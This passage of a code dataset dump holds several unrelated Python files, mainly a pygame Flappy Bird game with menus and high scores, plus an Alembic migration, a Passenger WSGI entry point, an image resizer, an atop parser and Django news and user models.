adjust! ###\n op.create_table('service_catalog',\n sa.Column('service_id', sa.Integer(), nullable=False),\n sa.Column('service_name', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('service_id')\n )\n op.create_index(op.f('ix_service_catalog_service_name'), 'service_catalog', ['service_name'], unique=True)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('password', sa.String(length=128), nullable=True),\n sa.Column('roles', sa.String(length=64), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_index(op.f('ix_user_roles'), 'user', ['roles'], unique=False)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('pricelist',\n sa.Column('price_id', sa.Integer(), nullable=False),\n sa.Column('service_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('price', sa.Integer(), nullable=False),\n sa.Column('description', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['service_id'], ['service_catalog.service_id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('price_id')\n )\n op.create_table('profile',\n sa.Column('profile_id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('city', sa.String(length=64), nullable=False),\n sa.Column('about', sa.Text(), nullable=True),\n sa.Column('Instagram', sa.Text(), nullable=False),\n sa.Column('contacts', sa.Text(), nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('profile_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_table('profile')\n    op.drop_table('pricelist')\n    op.drop_index(op.f('ix_user_username'), table_name='user')\n    op.drop_index(op.f('ix_user_roles'), table_name='user')\n    op.drop_table('user')\n    op.drop_index(op.f('ix_service_catalog_service_name'), table_name='service_catalog')\n    op.drop_table('service_catalog')\n    # ### end Alembic commands ###\n","sub_path":"migrations/versions/27953385e40d_profiles_model.py","file_name":"27953385e40d_profiles_model.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"61918265","text":"from configparser import ConfigParser # helps us read and write .ini files\n\ndef get_configuration_data(filename=\"bd.ini\",section=\"postgresql\"):# has static default parameters\n    parser=ConfigParser()# create the parser\n    parser.read(filename)# read the bd.ini file\n    \n    # get the postgresql section of bd.ini for the database connection\n    db={}\n    \n    if parser.has_section(section):# check whether the postgresql section exists\n        params=parser.items(section)# get the parameters of the section\n        for param in params:# iterate over the parameters one by one\n            db[param[0]]=param[1]\n    else:\n        raise Exception('Section {0} was not found in file {1}'.format(section, filename))# raised when the section is not found\n    \n    return db# return the data\n","sub_path":"db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"381944788","text":"##### DREAMHOST SPECIFIC SETTINGS #####\n\nimport sys, os\n\nINTERP = '/home/acslater/.virtualenvs/iris-prod/bin/python'\n\nif sys.executable != INTERP:\n    os.execl(INTERP, INTERP, *sys.argv)\n\ncwd = os.getcwd()\nmyapp_directory = os.path.join(cwd, \"iris\")\nsys.stdout = sys.stderr\n\nsys.path.insert(0, myapp_directory)\nsys.path.append(cwd)\n\nos.environ['SITE_ENV'] = 'prod'\nos.environ['DJANGO_SETTINGS_MODULE'] = 'iris.settings'\n\nimport django.core.handlers.wsgi\nfrom paste.exceptions.errormiddleware import ErrorMiddleware\n\napplication = django.core.handlers.wsgi.WSGIHandler()\n\ndef testapplication(environ, start_response):\n    status = '200 OK'\n    output = 'Hello World! 
Running Python version ' + sys.version + '\\n\\n'\n    response_headers = [('Content-type', 'text/plain'),\n                        ('Content-Length', str(len(output)))]\n    # to test paste's error catching prowess, uncomment the following line\n    # while this function is the \"application\"\n    #raise(\"error\")\n    start_response(status, response_headers)\n    return [output]\n\napplication = ErrorMiddleware(application, debug=True)","sub_path":"passenger_wsgi.py","file_name":"passenger_wsgi.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"160591422","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nYou have a directory full of photos; resize them so that none is larger than the iPhone 5 resolution.\nThe iPhone 5 resolution is (1136, 640).\n'''\nfrom PIL import Image\nimport glob\n\n# get a list of all images in the given directory\ndef get_imagelist():\n    return glob.glob(r'C:\\Users\\Administrator\\Pictures\\*.jpg')\n\n# image processing\ndef image_process(image,num,size=(1136,640)):\n    img=Image.open(image)\n    sizex,sizey=img.size\n    if sizex > size[0]:\n        sizex=size[0]\n    if sizey > size[1]:\n        sizey=size[1]\n    img=img.resize((sizex,sizey))\n    num=str(num)\n    img.save(num+'.jpg','jpeg')\n\n# main function\ndef main():\n    image_list=get_imagelist()\n    n=1\n    for image in image_list:\n        image_process(image,n)\n        n+=1\n\nif __name__=='__main__':\n    main()\n","sub_path":"0005/0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"132013605","text":"\"\"\"\n    Representation of an atop sample.\n\"\"\"\nimport logging\nimport json\n\nfrom memline import MemLine\nfrom cpuline import CpuLine\nfrom iso8601timestamp import Iso8601Timestamp\n\nclass AtopSample(object):\n    \"\"\"\n    An atop sample taken on a host at a particular time.\n    \"\"\"\n\n    def __init__(self, sample_no, logger=None):\n        self._logger = logger or logging.getLogger(__name__)\n        self.sample_no = sample_no\n        self.hostname = None\n        self.timestamp = None\n        self.lines = []\n\n    def parse_line(self, line):\n        if line.startswith(\"MEM\"):\n            self.lines.append(MemLine(line))\n        elif line.startswith(\"CPU\"):\n            self.lines.append(CpuLine(line))\n\n    def to_json(self):\n        if self.timestamp is None:\n            self._finalise_sample()\n        fields = {}\n        fields[\"@version\"] = 1\n        fields[\"@timestamp\"] = Iso8601Timestamp(self.timestamp).to_iso8601()\n        fields[\"host\"] = self.hostname\n        for line in self.lines:\n            line.addFields(fields)\n\n        self._logger.debug(\"Atop sample \" + str(self.sample_no) +\n            \": host=\" + fields[\"host\"] + \", timestamp=\" + fields[\"@timestamp\"])\n\n        return json.dumps(fields, sort_keys=True)\n\n    def _finalise_sample(self):\n        assert len(self.lines) > 0\n        first_line = self.lines[0]\n        if self.hostname is None:\n            self.hostname = first_line.get_host_name()\n        if self.timestamp is None:\n            self.timestamp = first_line.get_timestamp()\n\n","sub_path":"atopsample.py","file_name":"atopsample.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"232611769","text":"import pygame\nimport os\nimport sys\nimport random\nimport pickle\n\nSCREEN_WIDTH = 400\nSCREEN_HEIGHT = 600\nWHITE = (255, 255, 255)\nGREEN = (51, 255, 51)\nRED = (205, 32, 32)\nBLACK = (0,0,0)\n\n\ndef load_image(name):\n    \"\"\"\n    Load an image from a file and convert it to a surface.\n    :param name: name of the image file\n    :return: converted image\n    \"\"\"\n    fullname = os.path.join(\"images\", name)\n    image = pygame.image.load(fullname)\n    
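# convert_alpha() keeps per-pixel transparency and is faster to blit to the display\n    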
image = image.convert_alpha()\n return image\n\ndef load_sound(name):\n \"\"\"\n Upload a sound from file.\n :param name: name of the sound file\n :return: sound\n \"\"\"\n fullname = os.path.join(\"sounds\", name)\n sound = pygame.mixer.Sound(fullname)\n return sound\n\nclass Bird(pygame.sprite.Sprite):\n \"\"\"\n Class representing a bird.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize three birds and their rects.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.red_mid = load_image(\"redbird_mid.png\")\n self.red_rect = self.red_mid.get_rect(center=(50, 270))\n self.yellow_mid = load_image('yellowbird_mid.png')\n self.yellow_rect = self.yellow_mid.get_rect(center=(50,260))\n self.blue_mid = load_image('bluebird_mid.png')\n self.blue_rect = self.blue_mid.get_rect(center=(50,260))\n\n\nclass Floor(pygame.sprite.Sprite):\n \"\"\"\n Class representing the floor.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize the floor and its position.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.floor = pygame.transform.scale(load_image(\"base.png\"), (400, 130))\n self.position = 0\n\n def move(self):\n \"\"\"\n Repeatedly move the floor to the left.\n \"\"\"\n screen.blit(self.floor, (self.position, 500))\n screen.blit(self.floor, (self.position + 400, 500))\n\n\nclass Pipe(pygame.sprite.Sprite):\n \"\"\"\n Class representing the pipes.\n \"\"\"\n def __init__(self):\n \"\"\"\n Initialize top and bottom pipe.\n \"\"\"\n pygame.sprite.Sprite.__init__(self)\n self.green_bottom = pygame.transform.scale(load_image(\"green_bottom.png\"), (60, 350))\n self.green_top = pygame.transform.scale(load_image('green_top.png'), (60, 350))\n self.list_bottom = []\n self.list_top = []\n\n def create_bottom(self):\n \"\"\"\n Create a bottom pipe rectangle.\n :return: bottom pipe rectangle\n \"\"\"\n self.random_height = random.randrange(150, 440)\n self.bottom = self.green_bottom.get_rect(midtop=(430, self.random_height))\n return self.bottom\n\n def create_top(self):\n \"\"\"\n Create a top pipe rectangle.\n :return: top pipe rectangle\n \"\"\"\n self.top = self.green_bottom.get_rect(midbottom=(427, self.bottom.centery - 260))\n return self.top\n\n def move(self, option: float):\n \"\"\"\n Move top and bottom pipes repeatedly to the left.\n :param option: distance by which the pipes move\n :return: moving pipes\n \"\"\"\n for i in self.list_bottom:\n i.centerx -= option\n screen.blit(self.green_bottom, i)\n for i in self.list_top:\n i.centerx -= option\n screen.blit(self.green_top, i)\n\n def collision(self, bird_col):\n \"\"\"\n Check if bird collide with the pipes.\n :param bird_col: chosen bird rectangle\n :return: True if collided\n \"\"\"\n for i in self.list_bottom:\n for j in self.list_top:\n if i.colliderect(bird_col) or j.colliderect(bird_col):\n return True\n\ndef show_score(score, high_score, status):\n \"\"\"\n Display the score on the screen.\n :param score: gained score to display\n :param high_score: high_score to display\n :param option: state of the game('game_over', 'game_in' or 'high_score' when displaying the high score)\n :return: display wanted score\n \"\"\"\n font = pygame.font.Font('font.TTF', 40)\n if status == 'game_over':\n result = font.render(f\"SCORE: {int(score)}\", True, (255, 255, 255))\n screen.blit(result, (120,40))\n elif status == 'game_in':\n result = font.render(f\"{int(score)}\", True, (255, 255, 255))\n screen.blit(result, (185,40))\n elif status == 'high_score':\n result = font.render(f\"HIGH SCORE: {int(high_score)}\", True, (255,255,255))\n 
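# draw the saved high score on the end screen\n        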
screen.blit(result, (70,180))\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\npygame.display.set_caption(\"Flappy Bird\")\nfps = pygame.time.Clock()\nbackground_day = load_image(\"background_day.png\")\nbackground_day = pygame.transform.scale(background_day, (400, 600))\nbackground_night = load_image(\"background_night.png\")\nbackground_night = pygame.transform.scale(background_night, (400,600))\nstart_image = load_image(\"start.png\")\nstart_image = pygame.transform.scale(start_image, (200,300))\nstart_image_rect = start_image.get_rect(center=(200,270))\ngame_over_im = load_image(\"gameover.png\")\nclick_to_play = load_image(\"startclick.png\")\ndie_sound = load_sound('die.wav')\nhit_sound = load_sound('hit.wav')\npoint_sound = load_sound('point.wav')\nflap_sound = load_sound('flap.wav')\nflappy_im = pygame.transform.scale(load_image('flappy.png'), (200,100))\ngold_medal = pygame.transform.scale(load_image('gold.png'), (40,40))\nsilver_medal = pygame.transform.scale(load_image('silver.png'), (40,40))\nbronze_medal = pygame.transform.scale(load_image('bronze.png'), (40,40))\n\npipe = Pipe()\nbird = Bird()\nfloor = Floor()\n\ndef rules():\n \"\"\"\n Show rules of the game\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 20)\n font3 = pygame.font.SysFont('Consolas', 20)\n rul = True\n while rul:\n screen.blit(background_day, (0,0))\n screen.blit(flappy_im, (100,40))\n headline = font1.render(\"Game Rules\", True, WHITE)\n screen.blit(headline, (60,120))\n screen.blit(font2.render(\"This game is about flying a bird between pipes.\", True, BLACK),(20,195))\n screen.blit(font2.render(\"The bird is automatically flying down and you\", True, BLACK),(20,215))\n screen.blit(font2.render(\"can start its fly up by pressing a SPACE button \", True, BLACK), (20,235))\n screen.blit(font2.render(\"or click a mouse. When the bird collide with the\", True, BLACK),(20,255))\n screen.blit(font2.render(\"pipes or with the ground the game is over and\", True, BLACK),(20,275))\n screen.blit(font2.render(\"you have to start from the beginning. After \", True, BLACK),(20,295))\n screen.blit(font2.render(\"avoiding the pipe you will get one point.\", True, BLACK),(20,315))\n screen.blit(font2.render(\"So let's try it yourself and have fun!\", True, BLACK), (20, 335))\n screen.blit(font3.render(\"Press SPACE to go back.\", True, RED),(70,475))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n rul = False\n menu()\n\ndef author_info():\n \"\"\"\n Show info about author of this game\"\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 25)\n font3 = pygame.font.SysFont('Consolas', 20)\n info = True\n while info:\n screen.blit(background_day, (0,0))\n screen.blit(flappy_im, (95, 40))\n headline = font1.render(\"Author\", True, WHITE)\n screen.blit(headline, (110, 120))\n screen.blit(font2.render(\"Hi! I am Julia and this is a Flappy Bird\", True, BLACK),(20, 190))\n screen.blit(font2.render(\"game - the most annoying game in the\", True, BLACK), (20, 220))\n screen.blit(font2.render(\"world! But to be honest one of my\", True, BLACK),(20,250))\n screen.blit(font2.render(\"favourite and that's why I've decided to \", True, BLACK), (20,280))\n screen.blit(font2.render(\"make it :). 
I hope you will enjoy it too!\", True, BLACK), (20,310))\n line6 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line6, (70, 490))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n info = False\n menu()\n\ndef choose_options():\n \"\"\"\n Show screen with possible game options which player can choose and start the game after choosing.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 20)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.SysFont('arial', 25)\n options = True\n while options:\n screen.blit(background_day, (0, 0))\n screen.blit(load_image('redbird_mid.png'), (30, 260))\n screen.blit(load_image('yellowbird_mid.png'), (30, 300))\n screen.blit(load_image('bluebird_mid.png'), (30, 340))\n screen.blit(load_image('redbird_mid.png'), (230, 260))\n screen.blit(load_image('yellowbird_mid.png'), (230, 300))\n screen.blit(load_image('bluebird_mid.png'), (230, 340))\n screen.blit(font2.render(\"Press 1\", True, WHITE), (80, 260))\n screen.blit(font2.render(\"Press 2\", True, WHITE), (80, 300))\n screen.blit(font2.render(\"Press 3\", True, WHITE), (80,340))\n screen.blit(font2.render(\"Press 4\", True, WHITE), (280,260))\n screen.blit(font2.render(\"Press 5\", True, WHITE), (280,300))\n screen.blit(font2.render(\"Press 6\", True, WHITE), (280,340))\n screen.blit(font4.render(\"Choose mode and bird color to start:\", True, WHITE), (30,175))\n screen.blit(font4.render(\"EASY\", True, WHITE), (70,215))\n screen.blit(font4.render(\"HARD\", True, WHITE), (270,215))\n screen.blit(flappy_im, (100, 40))\n headline = font1.render(\"Options\", True, WHITE)\n screen.blit(headline, (100, 120))\n line5 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line5, (70, 490))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n menu()\n if event.key == pygame.K_1:\n flap('easy', 'red')\n if event.key == pygame.K_2:\n flap('easy', 'yellow')\n if event.key == pygame.K_3:\n flap('easy', 'blue')\n if event.key == pygame.K_4:\n flap('hard', 'red')\n if event.key == pygame.K_5:\n flap('hard', 'yellow')\n if event.key == pygame.K_6:\n flap('hard', 'blue')\n pygame.display.update()\n fps.tick(100)\n\ndef show_options():\n \"\"\"\n Only show possible options of the game.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 25)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.SysFont('arial', 20)\n show = True\n while show:\n screen.blit(background_day, (0, 0))\n screen.blit(flappy_im, (95, 40))\n screen.blit(load_image('redbird_mid.png'), (120, 300))\n screen.blit(load_image('yellowbird_mid.png'), (180, 300))\n screen.blit(load_image('bluebird_mid.png'), (240, 300))\n screen.blit(font2.render(\"In this game you have two possible\", True, BLACK), (30, 175))\n screen.blit(font2.render(\"difficulty levels: EASY and HARD\", True, BLACK), (30,210))\n screen.blit(font2.render('and three bird colors to choose:', True, BLACK), (30,245))\n screen.blit(font4.render('You will be able to choose them ', True, BLACK), (70, 380))\n screen.blit(font4.render('after clicking start button.', True, BLACK), (94,400))\n headline = font1.render(\"Options\", True, WHITE)\n screen.blit(headline, (100, 120))\n line5 = 
font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line5, (70, 490))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n menu()\n pygame.display.update()\n fps.tick(100)\n\n\ndef show_records():\n \"\"\"\n Show the screen with three high scores in easy and hard mode.\n \"\"\"\n font1 = pygame.font.Font('font.TTF', 50)\n font2 = pygame.font.SysFont('arial', 30)\n font3 = pygame.font.SysFont('Consolas', 20)\n font4 = pygame.font.Font('font.TTF', 40)\n screen.blit(background_day, (0, 0))\n with open('high_score4.dat', 'rb') as file:\n score1 = pickle.load(file)\n with open('high_score3.dat', 'rb') as file:\n score2 = pickle.load(file)\n with open('high_score2.dat', 'rb') as file:\n score3 = pickle.load(file)\n with open('high_score7.dat', 'rb') as file:\n score4 = pickle.load(file)\n with open('high_score6.dat', 'rb') as file:\n score5 = pickle.load(file)\n with open('high_score5.dat', 'rb') as file:\n score6 = pickle.load(file)\n show = True\n while show:\n screen.blit(gold_medal, (15,205))\n screen.blit(silver_medal, (12,260))\n screen.blit(bronze_medal, (13,315))\n screen.blit(gold_medal, (215, 205))\n screen.blit(silver_medal, (212, 260))\n screen.blit(bronze_medal, (213, 315))\n screen.blit(flappy_im, (100, 40))\n headline = font1.render(\"High Scores\", True, WHITE)\n screen.blit(headline, (50, 100))\n screen.blit(font2.render(\"EASY\", True, WHITE), (50,160))\n screen.blit(font2.render(\"HARD\", True, WHITE), (250,160))\n screen.blit(font4.render(str(score1), True, WHITE), (70,205))\n screen.blit(font4.render(str(score2), True, WHITE), (70, 260))\n screen.blit(font4.render(str(score3), True, WHITE), (70, 315))\n screen.blit(font4.render(str(score4), True, WHITE), (270, 205))\n screen.blit(font4.render(str(score5), True, WHITE), (270, 260))\n screen.blit(font4.render(str(score6), True, WHITE), (270, 315))\n line6 = font3.render(\"Press SPACE to go back.\", True, RED)\n screen.blit(line6, (70, 490))\n pygame.display.update()\n fps.tick(100)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n show = False\n menu()\n\ndef update_easy_high_scores(score):\n \"\"\"\n Update the high score of game easy mode and write it to the appropriate file.\n :param score: gained score\n \"\"\"\n with open('high_score4.dat', 'rb') as f4:\n last_high = pickle.load(f4)\n if score >= last_high:\n with open('high_score4.dat', 'wb') as f4:\n pickle.dump(score, f4)\n else:\n with open('high_score3.dat', 'rb') as f3:\n last_high = pickle.load(f3)\n if score >= last_high:\n with open('high_score3.dat', 'wb') as f3:\n pickle.dump(score, f3)\n else:\n with open('high_score2.dat', 'rb') as f2:\n last_high = pickle.load(f2)\n if score > last_high:\n with open('high_score2.dat', 'wb') as f2:\n pickle.dump(score, f2)\n\ndef update_hard_high_scores(score):\n \"\"\"\n Update the high score of game hard mode and write it to the appropriate file.\n :param score: gained score\n \"\"\"\n with open('high_score7.dat', 'rb') as f7:\n last_high = pickle.load(f7)\n if score >= last_high:\n with open('high_score7.dat', 'wb') as f7:\n pickle.dump(score, f7)\n else:\n with open('high_score6.dat', 'rb') as f6:\n last_high = pickle.load(f6)\n if score >= last_high:\n with open('high_score6.dat', 'wb') as f6:\n pickle.dump(score, f6)\n else:\n with open('high_score5.dat', 'rb') as f5:\n 
last_high = pickle.load(f5)\n if score > last_high:\n with open('high_score5.dat', 'wb') as f5:\n pickle.dump(score, f5)\n\ndef menu():\n \"\"\"\n Show screen with the main menu.\n \"\"\"\n font = pygame.font.Font('font.TTF', 30)\n font2 = pygame.font.SysFont('Consolas', 20)\n text = font2.render(\"Use arrow keys to navigate.\", True, RED)\n text1 = font2.render(\"Press SPACE to choose.\", True, RED)\n\n screen.blit(background_day, (0, 0))\n screen.blit(floor.floor, (0, 500))\n screen.blit(start_image, (100, 20))\n\n pygame.draw.rect(screen, RED, pygame.Rect(60, 340, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 340, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(60, 395, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 395, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(60, 450, 130, 40))\n pygame.draw.rect(screen, RED, pygame.Rect(210, 450, 130, 40))\n\n m = True\n selected = 'Start'\n\n while m:\n screen.blit(text, (60,530))\n screen.blit(text1, (80, 560))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if selected == \"Start\":\n if event.key == pygame.K_DOWN:\n selected = \"Options\"\n if event.key == pygame.K_RIGHT:\n selected = \"Rules\"\n elif selected == \"Rules\":\n if event.key == pygame.K_LEFT:\n selected = \"Start\"\n if event.key == pygame.K_DOWN:\n selected = \"Records\"\n elif selected == \"Options\":\n if event.key == pygame.K_UP:\n selected = \"Start\"\n if event.key == pygame.K_DOWN:\n selected = \"Author\"\n if event.key == pygame.K_RIGHT:\n selected = \"Records\"\n elif selected == \"Records\":\n if event.key == pygame.K_UP:\n selected = \"Rules\"\n if event.key == pygame.K_DOWN:\n selected = \"Exit\"\n if event.key == pygame.K_LEFT:\n selected = \"Options\"\n elif selected == \"Author\":\n if event.key == pygame.K_UP:\n selected = \"Options\"\n if event.key == pygame.K_RIGHT:\n selected = \"Exit\"\n elif selected == \"Exit\":\n if event.key == pygame.K_UP:\n selected = \"Records\"\n if event.key == pygame.K_LEFT:\n selected = \"Author\"\n if event.key == pygame.K_SPACE:\n if selected == \"Start\":\n choose_options()\n if selected == \"Exit\":\n pygame.quit()\n sys.exit()\n if selected == \"Rules\":\n rules()\n if selected == \"Options\":\n show_options()\n if selected == \"Records\":\n show_records()\n if selected == \"Author\":\n author_info()\n if selected == \"Start\":\n start_text = font.render(f\"Start\", True, GREEN)\n else:\n start_text = font.render(f\"Start\", True, WHITE)\n if selected == \"Exit\":\n exit_text = font.render(f\"Exit\", True, GREEN)\n else:\n exit_text = font.render(f\"Exit\", True, WHITE)\n if selected == \"Rules\":\n rules_text = font.render(f\"Rules\", True, GREEN)\n else:\n rules_text = font.render(f\"Rules\", True, WHITE)\n if selected == \"Author\":\n author_text = font.render(f\"Author\", True, GREEN)\n else:\n author_text = font.render(f\"Author\", True, WHITE)\n if selected == \"Records\":\n scores_text = font.render(f\"Records\", True, GREEN)\n else:\n scores_text = font.render(f\"Records\", True, WHITE)\n if selected == \"Options\":\n options_text = font.render(f\"Options\", True, GREEN)\n else:\n options_text = font.render(f\"Options\", True, WHITE)\n\n screen.blit(start_text, (80, 345))\n screen.blit(rules_text, (235, 345))\n screen.blit(options_text, (70, 400))\n screen.blit(scores_text, (215, 400))\n screen.blit(author_text, (75, 455))\n screen.blit(exit_text, (245, 455))\n pygame.display.update()\n 
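# cap the menu loop at 100 frames per second\n        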
fps.tick(100)\n\ndef flap(mode, color):\n \"\"\"\n Main game - Flappy Bird.\n :param mode: 'easy' or 'hard'\n :param color: color of the bird (red, yellow or blue)\n \"\"\"\n if mode == 'easy':\n SHOWPIPE = pygame.USEREVENT\n pygame.time.set_timer(SHOWPIPE, 2300)\n elif mode == 'hard':\n SHOWPIPE = pygame.USEREVENT\n pygame.time.set_timer(SHOWPIPE, 1000)\n\n bird_mov = 0\n game = True\n score = 0\n sound = True\n\n while True:\n if mode == 'easy':\n screen.blit(background_day, (0, 0))\n elif mode == 'hard':\n screen.blit(background_night, (0,0))\n if color == 'red':\n screen.blit(bird.red_mid, bird.red_rect)\n bird_col = bird.red_rect\n elif color == 'yellow':\n screen.blit(bird.yellow_mid, bird.yellow_rect)\n bird_col = bird.yellow_rect\n elif color == 'blue':\n screen.blit(bird.blue_mid, bird.blue_rect)\n bird_col = bird.blue_rect\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if (event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE) or event.type == pygame.MOUSEBUTTONDOWN:\n if not game:\n score = 0\n flap_sound.play()\n game = True\n sound = True\n bird_mov = 0\n bird_mov += -2.3\n if event.type == SHOWPIPE:\n pipe.list_bottom.append(pipe.create_bottom())\n pipe.list_top.append(pipe.create_top())\n if event.type == pygame.KEYDOWN:\n if not game:\n if event.key == pygame.K_RETURN:\n score = 0\n bird_col.center = (50, 270)\n pipe.list_top.clear()\n pipe.list_bottom.clear()\n menu()\n\n bird_mov += 0.1\n bird_col.centery += bird_mov\n\n if game:\n if bird_col.centery <= 12:\n bird_col.centery = 12\n if mode == 'hard':\n floor.position += -2\n pipe.move(2)\n if mode == 'easy':\n floor.position += -1\n pipe.move(1)\n floor.move()\n if floor.position <= -400:\n floor.position = 0\n for i in pipe.list_top:\n if i.centerx == bird_col.centerx - 47:\n score += 1\n point_sound.play()\n show_score(score, 0,'game_in')\n else:\n screen.blit(floor.floor, (0, 500))\n screen.blit(game_over_im, (100, 100))\n screen.blit(click_to_play, (110, 250))\n font3 = pygame.font.SysFont('Consolas', 20)\n screen.blit(font3.render(\"Press ENTER to go to menu.\", True, RED), (60,535))\n screen.blit(font3.render(\"Press SPACE to play\", True, RED), (90,565))\n pipe.list_top.clear()\n pipe.list_bottom.clear()\n show_score(score, 0,'game_over')\n if mode == 'easy':\n update_easy_high_scores(score)\n show_score(score, pickle.load(open('high_score4.dat', 'rb')), 'high_score')\n elif mode == 'hard':\n update_hard_high_scores(score)\n show_score(score, pickle.load(open('high_score7.dat', 'rb')), 'high_score')\n\n if pipe.collision(bird_col):\n game = False\n die_sound.play()\n elif bird_col.centery >= 490:\n bird_col.centery = 490\n game = False\n if sound:\n hit_sound.play()\n sound = False\n\n pygame.display.update()\n fps.tick(100)\n\n\nif __name__ == '__main__':\n menu()\n","sub_path":"FlappyBird.py","file_name":"FlappyBird.py","file_ext":"py","file_size_in_byte":25255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"384602686","text":"\nfrom django.db import models\nimport datetime\nfrom django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User, UserManager\n\nclass News(models.Model):\n title = models.CharField(max_length=200)\n content = models.TextField()\n content_html = models.TextField()\n header = models.TextField()\n published = models.BooleanField(default=False)\n date_added = 
models.DateTimeField()\n sources = models.TextField()\n html_update_time = models.DateTimeField()\n from_ip = models.IntegerField()\n spam = models.BooleanField(default=False)\n img_cover_url= models.CharField(max_length=250)\n\n class Meta:\n db_table = 'news'\n app_label = 'xdev'\n verbose_name_plural = \"News\"\n\n def __str__(self):\n return self.title\n\n def __unicode__(self):\n return self.title\n\nclass SpamTitle(models.Model):\n title = models.CharField(max_length=200)\n\n class Meta:\n db_table = 'spamTitles'\n app_label = 'news'\n\nclass URL(models.Model):\n url = models.CharField(max_length=260)\n image = models.ForeignKey('Image', null=True, blank=True)\n\n class Meta:\n db_table = 'url'\n app_label = 'xdev'\n\nclass Image(models.Model):\n w = models.IntegerField()\n h = models.IntegerField()\n md5 = models.CharField(max_length=32)\n ext = models.CharField(max_length=4)\n\n class Meta:\n db_table = 'images'\n app_label = 'xdev'\n\n\n\n\n\n\n\n\n\n\nfrom django.contrib import admin\nfrom django.db import models\nimport datetime\nfrom django.utils.translation import gettext_lazy as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User, UserManager\nfrom django.contrib.auth.models import (\n BaseUserManager, AbstractBaseUser\n)\n\nclass MyUserManager(BaseUserManager):\n def create_user(self, email, password=None):\n \"\"\"\n Creates and saves a User with the given email, date of\n birth and password.\n \"\"\"\n if not email:\n raise ValueError('Users must have an email address')\n\n user = self.model(\n email=self.normalize_email(email),\n #date_of_birth=date_of_birth,\n )\n\n user.set_password(password)\n user.save(using=self._db)\n return user\n\n def create_superuser(self, email, password):\n \"\"\"\n Creates and saves a superuser with the given email, date of\n birth and password.\n \"\"\"\n user = self.create_user(email,\n password=password,\n #date_of_birth=date_of_birth\n )\n user.is_admin = False\n user.save(using=self._db)\n return user\n\nclass CustomUser(AbstractBaseUser):\n email = models.EmailField(\n verbose_name='email address',\n max_length=255,\n unique=True,\n db_index=True,\n )\n username = models.CharField(max_length=200)\n is_superuser = 